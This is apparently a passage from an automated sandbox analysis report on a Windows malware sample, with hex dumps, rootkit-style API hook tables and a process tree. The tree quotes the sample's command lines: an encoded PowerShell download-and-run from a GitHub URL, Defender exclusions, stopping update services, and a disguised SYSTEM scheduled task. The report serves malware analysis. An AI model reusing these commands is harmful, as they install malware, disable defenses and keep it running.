                                              2024-06-04 11:41:07 UTC1378INData Raw: f3 ff ff 48 8d 05 ce 09 9f 00 48 81 c4 a8 00 00 00 c3 48 81 ec a8 00 00 00 66 c7 44 24 20 65 00 66 c7 44 24 22 5b 00 66 c7 44 24 24 6e 00 66 c7 44 24 26 70 00 66 c7 44 24 28 72 00 66 c7 44 24 2a 7c 00 66 c7 44 24 2c 7d 00 66 c7 44 24 2e 7b 00 66 c7 44 24 30 82 00 66 c7 44 24 32 65 00 66 c7 44 24 34 56 00 66 c7 44 24 36 6a 00 66 c7 44 24 38 6c 00 66 c7 44 24 3a 71 00 66 c7 44 24 3c 72 00 66 c7 44 24 3e 77 00 66 c7 44 24 40 6e 00 66 c7 44 24 42 65 00 66 c7 44 24 44 5c 00 66 c7 44 24 46 62 00 66 c7 44 24 48 5c 00 66 c7 44 24 4a 5d 00 66 c7 44 24 4c 4e 00 66 c7 44 24 4e 56 00 66 c7 44 24 50 65 00 66 c7 44 24 52 4c 00 66 c7 44 24 54 7e 00 66 c7 44 24 56 7b 00 66 c7 44 24 58 7b 00 66 c7 44 24 5a 6e 00 66 c7 44 24 5c 77 00 66 c7 44 24 5e 7d 00 66 c7 44 24 60 4c
                                              Data Ascii: HHHfD$ efD$"[fD$$nfD$&pfD$(rfD$*|fD$,}fD$.{fD$0fD$2efD$4VfD$6jfD$8lfD$:qfD$<rfD$>wfD$@nfD$BefD$D\fD$FbfD$H\fD$J]fD$LNfD$NVfD$PefD$RLfD$T~fD$V{fD$X{fD$ZnfD$\wfD$^}fD$`L
                                              2024-06-04 11:41:07 UTC1378INData Raw: 05 28 ff 9e 00 01 48 8d 0d c6 f0 ff ff e8 f4 ed ff ff 48 8d 05 1d ff 9e 00 48 83 c4 38 c3 48 83 ec 38 c6 44 24 21 03 c6 44 24 22 53 c6 44 24 23 46 c6 44 24 24 53 c6 44 24 25 55 c6 44 24 26 52 c6 44 24 27 57 c6 44 24 28 48 c6 44 24 29 46 c6 44 24 2a 57 c6 44 24 2b 11 c6 44 24 2c 46 c6 44 24 2d 52 c6 44 24 2e 50 c6 44 24 2f e3 80 3d 3a fe 9e 00 00 75 38 c6 05 48 fe 9e 00 01 b8 00 00 00 00 48 8d 0d 2d fe 9e 00 0f b6 54 04 21 88 14 01 48 83 c0 01 48 83 f8 0f 75 ee c6 05 0c fe 9e 00 01 48 8d 0d 8a f0 ff ff e8 58 ed ff ff 48 8d 05 01 fe 9e 00 48 83 c4 38 c3 48 83 ec 38 c6 44 24 21 03 c6 44 24 22 58 c6 44 24 23 56 c6 44 24 24 11 c6 44 24 25 51 c6 44 24 26 52 c6 44 24 27 55 c6 44 24 28 57 c6 44 24 29 52 c6 44 24 2a 51 c6 44 24 2b 11 c6 44 24 2c 46 c6 44 24 2d 52
                                              Data Ascii: (HHH8H8D$!D$"SD$#FD$$SD$%UD$&RD$'WD$(HD$)FD$*WD$+D$,FD$-RD$.PD$/=:u8HH-T!HHuHXHH8H8D$!D$"XD$#VD$$D$%QD$&RD$'UD$(WD$)RD$*QD$+D$,FD$-R
                                              2024-06-04 11:41:07 UTC1378INData Raw: 48 8d 0d fd f2 9e 00 0f b6 54 04 21 88 14 01 48 83 c0 01 48 83 f8 0f 75 ee c6 05 dc f2 9e 00 01 48 8d 0d a2 f0 ff ff e8 78 e8 ff ff 48 8d 05 d1 f2 9e 00 48 83 c4 38 c3 48 83 ec 38 c6 44 24 23 03 c6 44 24 24 57 c6 44 24 25 52 c6 44 24 26 57 c6 44 24 27 44 c6 44 24 28 4f c6 44 24 29 44 c6 44 24 2a 59 c6 44 24 2b 11 c6 44 24 2c 46 c6 44 24 2d 52 c6 44 24 2e 50 c6 44 24 2f e3 80 3d 88 f9 9e 00 00 75 38 c6 05 94 f9 9e 00 01 b8 00 00 00 00 48 8d 0d 7b f9 9e 00 0f b6 54 04 23 88 14 01 48 83 c0 01 48 83 f8 0d 75 ee c6 05 5a f9 9e 00 01 48 8d 0d 88 ea ff ff e8 e6 e7 ff ff 48 8d 05 4f f9 9e 00 48 83 c4 38 c3 48 83 ec 48 c6 44 24 20 03 c6 44 24 21 5a c6 44 24 22 5a c6 44 24 23 5a c6 44 24 24 11 c6 44 24 25 57 c6 44 24 26 52 c6 44 24 27 57 c6 44 24 28 44 c6 44 24 29
                                              Data Ascii: HT!HHuHxHH8H8D$#D$$WD$%RD$&WD$'DD$(OD$)DD$*YD$+D$,FD$-RD$.PD$/=u8H{T#HHuZHHOH8HHD$ D$!ZD$"ZD$#ZD$$D$%WD$&RD$'WD$(DD$)
                                              2024-06-04 11:41:07 UTC1378INData Raw: 00 48 83 c4 48 c3 48 83 ec 48 c6 44 24 20 03 c6 44 24 21 5a c6 44 24 22 5a c6 44 24 23 5a c6 44 24 24 11 c6 44 24 25 58 c6 44 24 26 56 c6 44 24 27 11 c6 44 24 28 51 c6 44 24 29 52 c6 44 24 2a 55 c6 44 24 2b 57 c6 44 24 2c 52 c6 44 24 2d 51 c6 44 24 2e 11 c6 44 24 2f 46 c6 44 24 30 52 c6 44 24 31 50 c6 44 24 32 e3 80 3d 9a f2 9e 00 00 75 38 c6 05 ac f2 9e 00 01 b8 00 00 00 00 48 8d 0d 8d f2 9e 00 0f b6 54 04 20 88 14 01 48 83 c0 01 48 83 f8 13 75 ee c6 05 6c f2 9e 00 01 48 8d 0d 72 e6 ff ff e8 98 e2 ff ff 48 8d 05 61 f2 9e 00 48 83 c4 48 c3 48 83 ec 48 c6 44 24 20 03 c6 44 24 21 53 c6 44 24 22 44 c6 44 24 23 51 c6 44 24 24 47 c6 44 24 25 44 c6 44 24 26 56 c6 44 24 27 48 c6 44 24 28 46 c6 44 24 29 58 c6 44 24 2a 55 c6 44 24 2b 4c c6 44 24 2c 57 c6 44 24 2d
                                              Data Ascii: HHHHD$ D$!ZD$"ZD$#ZD$$D$%XD$&VD$'D$(QD$)RD$*UD$+WD$,RD$-QD$.D$/FD$0RD$1PD$2=u8HT HHulHrHaHHHHD$ D$!SD$"DD$#QD$$GD$%DD$&VD$'HD$(FD$)XD$*UD$+LD$,WD$-
                                              2024-06-04 11:41:07 UTC1378INData Raw: 83 f8 13 75 ee c6 05 44 e8 9e 00 01 48 8d 0d da e5 ff ff e8 c8 dd ff ff 48 8d 05 41 e8 9e 00 48 83 c4 48 c3 48 83 ec 48 c6 44 24 20 03 c6 44 24 21 57 c6 44 24 22 52 c6 44 24 23 57 c6 44 24 24 44 c6 44 24 25 4f c6 44 24 26 44 c6 44 24 27 47 c6 44 24 28 45 c6 44 24 29 4f c6 44 24 2a 52 c6 44 24 2b 46 c6 44 24 2c 4e c6 44 24 2d 11 c6 44 24 2e 46 c6 44 24 2f 52 c6 44 24 30 50 c6 44 24 31 e3 80 3d 3f ee 9e 00 00 75 38 c6 05 50 ee 9e 00 01 b8 00 00 00 00 48 8d 0d 32 ee 9e 00 0f b6 54 04 20 88 14 01 48 83 c0 01 48 83 f8 12 75 ee c6 05 11 ee 9e 00 01 48 8d 0d 1f e0 ff ff e8 1d dd ff ff 48 8d 05 06 ee 9e 00 48 83 c4 48 c3 90 48 83 ec 48 c6 44 24 20 03 c6 44 24 21 50 c6 44 24 22 44 c6 44 24 23 4f c6 44 24 24 5a c6 44 24 25 44 c6 44 24 26 55 c6 44 24 27 48 c6 44 24
                                              Data Ascii: uDHHAHHHHD$ D$!WD$"RD$#WD$$DD$%OD$&DD$'GD$(ED$)OD$*RD$+FD$,ND$-D$.FD$/RD$0PD$1=?u8PH2T HHuHHHHHHD$ D$!PD$"DD$#OD$$ZD$%DD$&UD$'HD$
                                              2024-06-04 11:41:07 UTC1378INData Raw: 00 01 b8 00 00 00 00 48 8d 0d c0 e8 9e 00 0f b6 54 04 20 88 14 01 48 83 c0 01 48 83 f8 10 75 ee c6 05 9f e8 9e 00 01 48 8d 0d c5 db ff ff e8 4b d8 ff ff 48 8d 05 94 e8 9e 00 48 83 c4 38 c3 90 48 83 ec 38 c6 44 24 20 03 c6 44 24 21 5a c6 44 24 22 5a c6 44 24 23 5a c6 44 24 24 11 c6 44 24 25 51 c6 44 24 26 52 c6 44 24 27 55 c6 44 24 28 57 c6 44 24 29 52 c6 44 24 2a 51 c6 44 24 2b 11 c6 44 24 2c 46 c6 44 24 2d 52 c6 44 24 2e 50 c6 44 24 2f e3 80 3d 43 e6 9e 00 00 75 38 c6 05 5a e6 9e 00 01 b8 00 00 00 00 48 8d 0d 3e e6 9e 00 0f b6 54 04 20 88 14 01 48 83 c0 01 48 83 f8 10 75 ee c6 05 15 e6 9e 00 01 48 8d 0d a3 dc ff ff e8 a9 d7 ff ff 48 8d 05 12 e6 9e 00 48 83 c4 38 c3 90 48 83 ec 38 c6 44 24 20 03 c6 44 24 21 5a c6 44 24 22 5a c6 44 24 23 5a c6 44 24 24 11
                                              Data Ascii: HT HHuHKHH8H8D$ D$!ZD$"ZD$#ZD$$D$%QD$&RD$'UD$(WD$)RD$*QD$+D$,FD$-RD$.PD$/=Cu8ZH>T HHuHHH8H8D$ D$!ZD$"ZD$#ZD$$


                                              Code Manipulations

                                              Function NameHook TypeActive in Processes
                                              ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                              NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                              ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                              NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                              ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                              NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                              NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                              ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                              ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                              NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                              RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                              NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                              NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                              ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                              ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                              Function NameHook TypeNew Data
                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              Function NameHook TypeNew Data
                                              ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                              NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                              NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                              ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                              RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                              NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                              ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                              ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:07:41:01
                                              Start date:04/06/2024
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe"
                                              Imagebase:0x400000
                                              File size:4'608 bytes
                                              MD5 hash:3B5865192EA41263BE0A78B4D8A7C795
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:07:41:01
                                              Start date:04/06/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA="
                                              Imagebase:0xc80000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:2
                                              Start time:07:41:01
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:07:41:08
                                              Start date:04/06/2024
                                              Path:C:\Users\user\AppData\Local\Temp\svc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\svc.exe"
                                              Imagebase:0x7ff6fb800000
                                              File size:10'426'648 bytes
                                              MD5 hash:327B8ED0CDEBAE6962718656B5A72A4C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 79%, ReversingLabs
                                              • Detection: 68%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:07:41:08
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:07:41:08
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                              Imagebase:0x7ff78e560000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x6d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\sc.exe
                                              Wow64 process (32bit):false
                                              Commandline:sc stop UsoSvc
                                              Imagebase:0x7ff61f630000
                                              File size:72'192 bytes
                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:10
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\sc.exe
                                              Wow64 process (32bit):false
                                              Commandline:sc stop WaaSMedicSvc
                                              Imagebase:0x7ff61f630000
                                              File size:72'192 bytes
                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:11
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\sc.exe
                                              Wow64 process (32bit):false
                                              Commandline:sc stop wuauserv
                                              Imagebase:0x7ff61f630000
                                              File size:72'192 bytes
                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:12
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\sc.exe
                                              Wow64 process (32bit):false
                                              Commandline:sc stop bits
                                              Imagebase:0x7ff61f630000
                                              File size:72'192 bytes
                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:13
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\sc.exe
                                              Wow64 process (32bit):false
                                              Commandline:sc stop dosvc
                                              Imagebase:0x7ff61f630000
                                              File size:72'192 bytes
                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:07:41:11
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              Imagebase:0x7ff78e560000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\dialer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\dialer.exe
                                              Imagebase:0x7ff7e1140000
                                              File size:39'936 bytes
                                              MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:17
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:18
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\powercfg.exe
                                              Wow64 process (32bit):false
                                              Commandline:powercfg /x -hibernate-timeout-ac 0
                                              Imagebase:0x7ff793f90000
                                              File size:96'256 bytes
                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\powercfg.exe
                                              Wow64 process (32bit):false
                                              Commandline:powercfg /x -hibernate-timeout-dc 0
                                              Imagebase:0x7ff793f90000
                                              File size:96'256 bytes
                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:21
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\powercfg.exe
                                              Wow64 process (32bit):false
                                              Commandline:powercfg /x -standby-timeout-ac 0
                                              Imagebase:0x7ff793f90000
                                              File size:96'256 bytes
                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:22
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\powercfg.exe
                                              Wow64 process (32bit):false
                                              Commandline:powercfg /x -standby-timeout-dc 0
                                              Imagebase:0x7ff793f90000
                                              File size:96'256 bytes
                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:23
                                              Start time:07:41:12
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\winlogon.exe
                                              Wow64 process (32bit):false
                                              Commandline:winlogon.exe
                                              Imagebase:0x7ff7cd660000
                                              File size:906'240 bytes
                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:24
                                              Start time:07:41:13
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\lsass.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\lsass.exe
                                              Imagebase:0x7ff7a2ae0000
                                              File size:59'456 bytes
                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:25
                                              Start time:07:41:14
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:26
                                              Start time:07:41:14
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\dwm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"dwm.exe"
                                              Imagebase:0x7ff74e710000
                                              File size:94'720 bytes
                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:27
                                              Start time:07:41:16
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:28
                                              Start time:07:41:17
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                              Imagebase:0x7ff6eef20000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:29
                                              Start time:07:41:17
                                              Start date:04/06/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
